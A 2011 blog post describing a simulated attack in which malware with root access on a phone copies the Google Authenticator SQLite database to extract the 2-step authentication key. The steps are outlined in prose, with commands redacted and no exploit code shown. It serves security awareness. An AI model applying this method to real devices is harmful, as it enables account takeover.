June 3, 2011
Having 2-step authentication makes it harder for your account to be hijacked and for malicious users to pose as you–instead of just guessing, stealing, or cracking your password (something only you’re supposed to know) to gain completely free access to your account, they would additionally need to have your phone with the Google Authenticator App installed, that generates a cryptographically pseudo-random number every 30 seconds (something only you’re supposed to have).
It’s a well-known fact that smartphones today, whether iOS or Android-based, are essentially computers. And yes, that means they are vulnerable to “viruses” and “malware” much the same as PC’s are. In particular, one way for malicious software to get onto your smartphone is through repackaging and redistribution through a third-party grey-market or non-official market (e.g. Apple Store, Android Market)–or even sneak their apps in. Once the malicious code is on your phone, it has free reign to do whatever it wants, having root access to your phone (via jailbroken iOS, rooted Android, OS exploit, etc). With root access, it can listen to your network traffic and examine your file system.
In this simulated attack, even though apps are “sandboxed” from one another through file ownership (user, group = app_321), a root user has no such restrictions. Simply copy over the SQLite DB file, examine and/or manipulate it in SQLite, and the attacker now has your auth key to impersonate you as often as he wants and pleases.
Screenshot here, with sensitive commands/output replaced:
Edit: 2011.06.14 – Here is a published Android exploit that the attacker could use in conjunction to compromise Google Authenticator–it’s just an example, but there are many out there.